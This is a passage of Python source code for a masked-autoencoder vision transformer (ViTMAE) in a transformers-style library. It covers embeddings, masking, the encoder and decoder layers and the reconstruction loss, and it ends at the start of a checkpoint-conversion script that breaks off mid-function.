attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
the self-attention heads.
"""
loss: Optional[torch.FloatTensor] = None
logits: torch.FloatTensor = None
mask: torch.LongTensor = None
ids_restore: torch.LongTensor = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
def get_2d_sincos_pos_embed(embed_dim, grid_size, add_cls_token=False):
"""
Create 2D sin/cos positional embeddings.
Args:
embed_dim (`int`):
Embedding dimension.
grid_size (`int`):
The grid height and width.
add_cls_token (`bool`, *optional*, defaults to `False`):
Whether or not to add a classification (CLS) token.
Returns:
(`torch.FloatTensor` of shape (grid_size*grid_size, embed_dim) or (1+grid_size*grid_size, embed_dim): the
position embeddings (with or without classification token)
"""
grid_h = np.arange(grid_size, dtype=np.float32)
grid_w = np.arange(grid_size, dtype=np.float32)
grid = np.meshgrid(grid_w, grid_h) # here w goes first
grid = np.stack(grid, axis=0)
grid = grid.reshape([2, 1, grid_size, grid_size])
pos_embed = get_2d_sincos_pos_embed_from_grid(embed_dim, grid)
if add_cls_token:
pos_embed = np.concatenate([np.zeros([1, embed_dim]), pos_embed], axis=0)
return pos_embed
def get_2d_sincos_pos_embed_from_grid(embed_dim, grid):
if embed_dim % 2 != 0:
raise ValueError("embed_dim must be even")
# use half of dimensions to encode grid_h
emb_h = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[0]) # (H*W, D/2)
emb_w = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[1]) # (H*W, D/2)
emb = np.concatenate([emb_h, emb_w], axis=1) # (H*W, D)
return emb
def get_1d_sincos_pos_embed_from_grid(embed_dim, pos):
"""
embed_dim: output dimension for each position pos: a list of positions to be encoded: size (M,) out: (M, D)
"""
if embed_dim % 2 != 0:
raise ValueError("embed_dim must be even")
omega = np.arange(embed_dim // 2, dtype=float)
omega /= embed_dim / 2.0
omega = 1.0 / 10000**omega # (D/2,)
pos = pos.reshape(-1) # (M,)
out = np.einsum("m,d->md", pos, omega) # (M, D/2), outer product
emb_sin = np.sin(out) # (M, D/2)
emb_cos = np.cos(out) # (M, D/2)
emb = np.concatenate([emb_sin, emb_cos], axis=1) # (M, D)
return emb
class ViTMAEEmbeddings(nn.Module):
"""
Construct the CLS token, position and patch embeddings.
"""
def __init__(self, config):
super().__init__()
self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
self.patch_embeddings = ViTMAEPatchEmbeddings(config)
self.num_patches = self.patch_embeddings.num_patches
# fixed sin-cos embedding
self.position_embeddings = nn.Parameter(
torch.zeros(1, self.num_patches + 1, config.hidden_size), requires_grad=False
)
self.config = config
self.initialize_weights()
def initialize_weights(self):
# initialize (and freeze) position embeddings by sin-cos embedding
pos_embed = get_2d_sincos_pos_embed(
self.position_embeddings.shape[-1], int(self.patch_embeddings.num_patches**0.5), add_cls_token=True
)
self.position_embeddings.data.copy_(torch.from_numpy(pos_embed).float().unsqueeze(0))
# initialize patch_embeddings like nn.Linear (instead of nn.Conv2d)
w = self.patch_embeddings.projection.weight.data
torch.nn.init.xavier_uniform_(w.view([w.shape[0], -1]))
# timm's trunc_normal_(std=.02) is effectively normal_(std=0.02) as cutoff is too big (2.)
torch.nn.init.normal_(self.cls_token, std=self.config.initializer_range)
def random_masking(self, sequence, noise=None):
"""
Perform per-sample random masking by per-sample shuffling. Per-sample shuffling is done by argsort random
noise.
Args:
sequence (`torch.LongTensor` of shape `(batch_size, sequence_length, dim)`)
noise (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*) which is
mainly used for testing purposes to control randomness and maintain the reproducibility
"""
batch_size, seq_length, dim = sequence.shape
len_keep = int(seq_length * (1 - self.config.mask_ratio))
if noise is None:
noise = torch.rand(batch_size, seq_length, device=sequence.device) # noise in [0, 1]
# sort noise for each sample
ids_shuffle = torch.argsort(noise, dim=1) # ascend: small is keep, large is remove
ids_restore = torch.argsort(ids_shuffle, dim=1)
# keep the first subset
ids_keep = ids_shuffle[:, :len_keep]
sequence_unmasked = torch.gather(sequence, dim=1, index=ids_keep.unsqueeze(-1).repeat(1, 1, dim))
# generate the binary mask: 0 is keep, 1 is remove
mask = torch.ones([batch_size, seq_length], device=sequence.device)
mask[:, :len_keep] = 0
# unshuffle to get the binary mask
mask = torch.gather(mask, dim=1, index=ids_restore)
return sequence_unmasked, mask, ids_restore
def forward(self, pixel_values, noise=None):
batch_size, num_channels, height, width = pixel_values.shape
embeddings = self.patch_embeddings(pixel_values)
# add position embeddings w/o cls token
embeddings = embeddings + self.position_embeddings[:, 1:, :]
# masking: length -> length * config.mask_ratio
embeddings, mask, ids_restore = self.random_masking(embeddings, noise)
# append cls token
cls_token = self.cls_token + self.position_embeddings[:, :1, :]
cls_tokens = cls_token.expand(embeddings.shape[0], -1, -1)
embeddings = torch.cat((cls_tokens, embeddings), dim=1)
return embeddings, mask, ids_restore
class ViTMAEPatchEmbeddings(nn.Module):
"""
This class turns `pixel_values` of shape `(batch_size, num_channels, height, width)` into the initial
`hidden_states` (patch embeddings) of shape `(batch_size, seq_length, hidden_size)` to be consumed by a
Transformer.
"""
def __init__(self, config):
super().__init__()
image_size, patch_size = config.image_size, config.patch_size
num_channels, hidden_size = config.num_channels, config.hidden_size
image_size = image_size if isinstance(image_size, collections.abc.Iterable) else (image_size, image_size)
patch_size = patch_size if isinstance(patch_size, collections.abc.Iterable) else (patch_size, patch_size)
num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
self.image_size = image_size
self.patch_size = patch_size
self.num_channels = num_channels
self.num_patches = num_patches
self.projection = nn.Conv2d(num_channels, hidden_size, kernel_size=patch_size, stride=patch_size)
def forward(self, pixel_values):
batch_size, num_channels, height, width = pixel_values.shape
if num_channels != self.num_channels:
raise ValueError(
"Make sure that the channel dimension of the pixel values match with the one set in the configuration."
)
if height != self.image_size[0] or width != self.image_size[1]:
raise ValueError(
f"Input image size ({height}*{width}) doesn't match model ({self.image_size[0]}*{self.image_size[1]})."
)
x = self.projection(pixel_values).flatten(2).transpose(1, 2)
return x
# Copied from transformers.models.vit.modeling_vit.ViTSelfAttention ViT->ViTMAE
class ViTMAESelfAttention(nn.Module):
def __init__(self, config: ViTMAEConfig) -> None:
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
f"The hidden size {config.hidden_size,} is not a multiple of the number of attention "
f"heads {config.num_attention_heads}."
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.key = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.value = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
def transpose_for_scores(self, x: torch.Tensor) -> torch.Tensor:
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self, hidden_states, head_mask: Optional[torch.Tensor] = None, output_attentions: bool = False
) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
mixed_query_layer = self.query(hidden_states)
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
# Normalize the attention scores to probabilities.
attention_probs = nn.functional.softmax(attention_scores, dim=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
# Copied from transformers.models.vit.modeling_vit.ViTSelfOutput with ViT->ViTMAE
class ViTMAESelfOutput(nn.Module):
"""
The residual connection is defined in ViTMAELayer instead of here (as is the case with other models), due to the
layernorm applied before each block.
"""
def __init__(self, config: ViTMAEConfig) -> None:
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
# Copied from transformers.models.vit.modeling_vit.ViTAttention with ViT->ViTMAE
class ViTMAEAttention(nn.Module):
def __init__(self, config: ViTMAEConfig) -> None:
super().__init__()
self.attention = ViTMAESelfAttention(config)
self.output = ViTMAESelfOutput(config)
self.pruned_heads = set()
def prune_heads(self, heads: Set[int]) -> None:
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.attention.num_attention_heads, self.attention.attention_head_size, self.pruned_heads
)
# Prune linear layers
self.attention.query = prune_linear_layer(self.attention.query, index)
self.attention.key = prune_linear_layer(self.attention.key, index)
self.attention.value = prune_linear_layer(self.attention.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
# Update hyper params and store pruned heads
self.attention.num_attention_heads = self.attention.num_attention_heads - len(heads)
self.attention.all_head_size = self.attention.attention_head_size * self.attention.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states: torch.Tensor,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
self_outputs = self.attention(hidden_states, head_mask, output_attentions)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.vit.modeling_vit.ViTIntermediate ViT->ViTMAE
class ViTMAEIntermediate(nn.Module):
def __init__(self, config: ViTMAEConfig) -> None:
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Copied from transformers.models.vit.modeling_vit.ViTOutput ViT->ViTMAE
class ViTMAEOutput(nn.Module):
def __init__(self, config: ViTMAEConfig) -> None:
super().__init__()
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = hidden_states + input_tensor
return hidden_states
# Copied from transformers.models.vit.modeling_vit.ViTLayer with ViT->ViTMAE
class ViTMAELayer(nn.Module):
"""This corresponds to the Block class in the timm implementation."""
def __init__(self, config: ViTMAEConfig) -> None:
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = ViTMAEAttention(config)
self.intermediate = ViTMAEIntermediate(config)
self.output = ViTMAEOutput(config)
self.layernorm_before = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.layernorm_after = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
def forward(
self,
hidden_states: torch.Tensor,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
self_attention_outputs = self.attention(
self.layernorm_before(hidden_states), # in ViTMAE, layernorm is applied before self-attention
head_mask,
output_attentions=output_attentions,
)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
# first residual connection
hidden_states = attention_output + hidden_states
# in ViTMAE, layernorm is also applied after self-attention
layer_output = self.layernorm_after(hidden_states)
layer_output = self.intermediate(layer_output)
# second residual connection is done here
layer_output = self.output(layer_output, hidden_states)
outputs = (layer_output,) + outputs
return outputs
# Copied from transformers.models.vit.modeling_vit.ViTEncoder with ViT->ViTMAE
class ViTMAEEncoder(nn.Module):
def __init__(self, config: ViTMAEConfig) -> None:
super().__init__()
self.config = config
self.layer = nn.ModuleList([ViTMAELayer(config) for _ in range(config.num_hidden_layers)])
self.gradient_checkpointing = False
def forward(
self,
hidden_states: torch.Tensor,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
) -> Union[tuple, BaseModelOutput]:
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
layer_head_mask,
)
else:
layer_outputs = layer_module(hidden_states, layer_head_mask, output_attentions)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, all_hidden_states, all_self_attentions] if v is not None)
return BaseModelOutput(
last_hidden_state=hidden_states,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
)
class ViTMAEPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = ViTMAEConfig
base_model_prefix = "vit"
main_input_name = "pixel_values"
supports_gradient_checkpointing = True
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, (nn.Linear, nn.Conv2d)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, ViTMAEEncoder):
module.gradient_checkpointing = value
VIT_MAE_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`ViTMAEConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
VIT_MAE_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See [`ViTImageProcessor.__call__`]
for details.
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare ViTMAE Model transformer outputting raw hidden-states without any specific head on top.",
VIT_MAE_START_DOCSTRING,
)
class ViTMAEModel(ViTMAEPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.config = config
self.embeddings = ViTMAEEmbeddings(config)
self.encoder = ViTMAEEncoder(config)
self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.embeddings.patch_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=ViTMAEModelOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
pixel_values: Optional[torch.FloatTensor] = None,
noise: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, ViTMAEModelOutput]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoImageProcessor, ViTMAEModel
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
>>> model = ViTMAEModel.from_pretrained("facebook/vit-mae-base")
>>> inputs = image_processor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
```"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if pixel_values is None:
raise ValueError("You have to specify pixel_values")
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output, mask, ids_restore = self.embeddings(pixel_values, noise=noise)
encoder_outputs = self.encoder(
embedding_output,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
sequence_output = self.layernorm(sequence_output)
if not return_dict:
return (sequence_output, mask, ids_restore) + encoder_outputs[1:]
return ViTMAEModelOutput(
last_hidden_state=sequence_output,
mask=mask,
ids_restore=ids_restore,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
class ViTMAEDecoder(nn.Module):
def __init__(self, config, num_patches):
super().__init__()
self.decoder_embed = nn.Linear(config.hidden_size, config.decoder_hidden_size, bias=True)
self.mask_token = nn.Parameter(torch.zeros(1, 1, config.decoder_hidden_size))
self.decoder_pos_embed = nn.Parameter(
torch.zeros(1, num_patches + 1, config.decoder_hidden_size), requires_grad=False
) # fixed sin-cos embedding
decoder_config = deepcopy(config)
decoder_config.hidden_size = config.decoder_hidden_size
decoder_config.num_hidden_layers = config.decoder_num_hidden_layers
decoder_config.num_attention_heads = config.decoder_num_attention_heads
decoder_config.intermediate_size = config.decoder_intermediate_size
self.decoder_layers = nn.ModuleList(
[ViTMAELayer(decoder_config) for _ in range(config.decoder_num_hidden_layers)]
)
self.decoder_norm = nn.LayerNorm(config.decoder_hidden_size, eps=config.layer_norm_eps)
self.decoder_pred = nn.Linear(
config.decoder_hidden_size, config.patch_size**2 * config.num_channels, bias=True
) # encoder to decoder
self.gradient_checkpointing = False
self.config = config
self.initialize_weights(num_patches)
def initialize_weights(self, num_patches):
# initialize (and freeze) position embeddings by sin-cos embedding
decoder_pos_embed = get_2d_sincos_pos_embed(
self.decoder_pos_embed.shape[-1], int(num_patches**0.5), add_cls_token=True
)
self.decoder_pos_embed.data.copy_(torch.from_numpy(decoder_pos_embed).float().unsqueeze(0))
# timm's trunc_normal_(std=.02) is effectively normal_(std=0.02) as cutoff is too big (2.)
torch.nn.init.normal_(self.mask_token, std=self.config.initializer_range)
def forward(
self,
hidden_states,
ids_restore,
output_attentions=False,
output_hidden_states=False,
return_dict=True,
):
# embed tokens
x = self.decoder_embed(hidden_states)
# append mask tokens to sequence
mask_tokens = self.mask_token.repeat(x.shape[0], ids_restore.shape[1] + 1 - x.shape[1], 1)
x_ = torch.cat([x[:, 1:, :], mask_tokens], dim=1) # no cls token
x_ = torch.gather(x_, dim=1, index=ids_restore.unsqueeze(-1).repeat(1, 1, x.shape[2])) # unshuffle
x = torch.cat([x[:, :1, :], x_], dim=1) # append cls token
# add pos embed
hidden_states = x + self.decoder_pos_embed
# apply Transformer layers (blocks)
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
for i, layer_module in enumerate(self.decoder_layers):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
None,
)
else:
layer_outputs = layer_module(hidden_states, head_mask=None, output_attentions=output_attentions)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
hidden_states = self.decoder_norm(hidden_states)
# predictor projection
logits = self.decoder_pred(hidden_states)
# remove cls token
logits = logits[:, 1:, :]
if not return_dict:
return tuple(v for v in [logits, all_hidden_states, all_self_attentions] if v is not None)
return ViTMAEDecoderOutput(
logits=logits,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
)
@add_start_docstrings(
"""The ViTMAE Model transformer with the decoder on top for self-supervised pre-training.
<Tip>
Note that we provide a script to pre-train this model on custom data in our [examples
directory](https://github.com/huggingface/transformers/tree/main/examples/pytorch/image-pretraining).
</Tip>
""",
VIT_MAE_START_DOCSTRING,
)
class ViTMAEForPreTraining(ViTMAEPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.config = config
self.vit = ViTMAEModel(config)
self.decoder = ViTMAEDecoder(config, num_patches=self.vit.embeddings.num_patches)
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.vit.embeddings.patch_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
def patchify(self, pixel_values):
"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values.
Returns:
`torch.FloatTensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Patchified pixel values.
"""
patch_size, num_channels = self.config.patch_size, self.config.num_channels
# sanity checks
if (pixel_values.shape[2] != pixel_values.shape[3]) or (pixel_values.shape[2] % patch_size != 0):
raise ValueError("Make sure the pixel values have a squared size that is divisible by the patch size")
if pixel_values.shape[1] != num_channels:
raise ValueError(
"Make sure the number of channels of the pixel values is equal to the one set in the configuration"
)
# patchify
batch_size = pixel_values.shape[0]
num_patches_one_direction = pixel_values.shape[2] // patch_size
patchified_pixel_values = pixel_values.reshape(
batch_size, num_channels, num_patches_one_direction, patch_size, num_patches_one_direction, patch_size
)
patchified_pixel_values = torch.einsum("nchpwq->nhwpqc", patchified_pixel_values)
patchified_pixel_values = patchified_pixel_values.reshape(
batch_size, num_patches_one_direction * num_patches_one_direction, patch_size**2 * num_channels
)
return patchified_pixel_values
def unpatchify(self, patchified_pixel_values):
"""
Args:
patchified_pixel_values (`torch.FloatTensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Patchified pixel values.
Returns:
`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`:
Pixel values.
"""
patch_size, num_channels = self.config.patch_size, self.config.num_channels
num_patches_one_direction = int(patchified_pixel_values.shape[1] ** 0.5)
# sanity check
if num_patches_one_direction**2 != patchified_pixel_values.shape[1]:
raise ValueError("Make sure that the number of patches can be squared")
# unpatchify
batch_size = patchified_pixel_values.shape[0]
patchified_pixel_values = patchified_pixel_values.reshape(
batch_size,
num_patches_one_direction,
num_patches_one_direction,
patch_size,
patch_size,
num_channels,
)
patchified_pixel_values = torch.einsum("nhwpqc->nchpwq", patchified_pixel_values)
pixel_values = patchified_pixel_values.reshape(
batch_size,
num_channels,
num_patches_one_direction * patch_size,
num_patches_one_direction * patch_size,
)
return pixel_values
def forward_loss(self, pixel_values, pred, mask):
"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values.
pred (`torch.FloatTensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Predicted pixel values.
mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
Tensor indicating which patches are masked (1) and which are not (0).
Returns:
`torch.FloatTensor`: Pixel reconstruction loss.
"""
target = self.patchify(pixel_values)
if self.config.norm_pix_loss:
mean = target.mean(dim=-1, keepdim=True)
var = target.var(dim=-1, keepdim=True)
target = (target - mean) / (var + 1.0e-6) ** 0.5
loss = (pred - target) ** 2
loss = loss.mean(dim=-1) # [N, L], mean loss per patch
loss = (loss * mask).sum() / mask.sum() # mean loss on removed patches
return loss
@add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=ViTMAEForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
pixel_values: Optional[torch.FloatTensor] = None,
noise: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, ViTMAEForPreTrainingOutput]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoImageProcessor, ViTMAEForPreTraining
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
>>> model = ViTMAEForPreTraining.from_pretrained("facebook/vit-mae-base")
>>> inputs = image_processor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> loss = outputs.loss
>>> mask = outputs.mask
>>> ids_restore = outputs.ids_restore
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.vit(
pixel_values,
noise=noise,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
latent = outputs.last_hidden_state
ids_restore = outputs.ids_restore
mask = outputs.mask
decoder_outputs = self.decoder(latent, ids_restore)
logits = decoder_outputs.logits # shape (batch_size, num_patches, patch_size*patch_size*num_channels)
loss = self.forward_loss(pixel_values, logits, mask)
if not return_dict:
output = (logits, mask, ids_restore) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return ViTMAEForPreTrainingOutput(
loss=loss,
logits=logits,
mask=mask,
ids_restore=ids_restore,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 7,532 | src/transformers/models/vit_mae/convert_vit_mae_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert ViT MAE checkpoints from the original repository: https://github.com/facebookresearch/mae"""
import argparse
import requests
import torch
from PIL import Image
from transformers import ViTMAEConfig, ViTMAEFeatureExtractor, ViTMAEForPreTraining
def rename_key(name):
if "cls_token" in name:
name = name.replace("cls_token", "vit.embeddings.cls_token")
if "mask_token" in name:
name = name.replace("mask_token", "decoder.mask_token")
if "decoder_pos_embed" in name:
name = name.replace("decoder_pos_embed", "decoder.decoder_pos_embed")
if "pos_embed" in name and "decoder" not in name:
name = name.replace("pos_embed", "vit.embeddings.position_embeddings")
if "patch_embed.proj" in name:
name = name.replace("patch_embed.proj", "vit.embeddings.patch_embeddings.projection")
if "patch_embed.norm" in name:
name = name.replace("patch_embed.norm", "vit.embeddings.norm")
if "decoder_blocks" in name:
name = name.replace("decoder_blocks", "decoder.decoder_layers")
if "blocks" in name:
name = name.replace("blocks", "vit.encoder.layer")
if "attn.proj" in name:
name = name.replace("attn.proj", "attention.output.dense")
if "attn" in name:
name = name.replace("attn", "attention.self")
if "norm1" in name:
name = name.replace("norm1", "layernorm_before")
if "norm2" in name:
name = name.replace("norm2", "layernorm_after")
if "mlp.fc1" in name:
name = name.replace("mlp.fc1", "intermediate.dense")
if "mlp.fc2" in name:
name = name.replace("mlp.fc2", "output.dense")
if "decoder_embed" in name:
name = name.replace("decoder_embed", "decoder.decoder_embed")
if "decoder_norm" in name:
name = name.replace("decoder_norm", "decoder.decoder_norm")
if "decoder_pred" in name:
name = name.replace("decoder_pred", "decoder.decoder_pred")
if "norm.weight" in name and "decoder" not in name:
name = name.replace("norm.weight", "vit.layernorm.weight")
if "norm.bias" in name and "decoder" not in name:
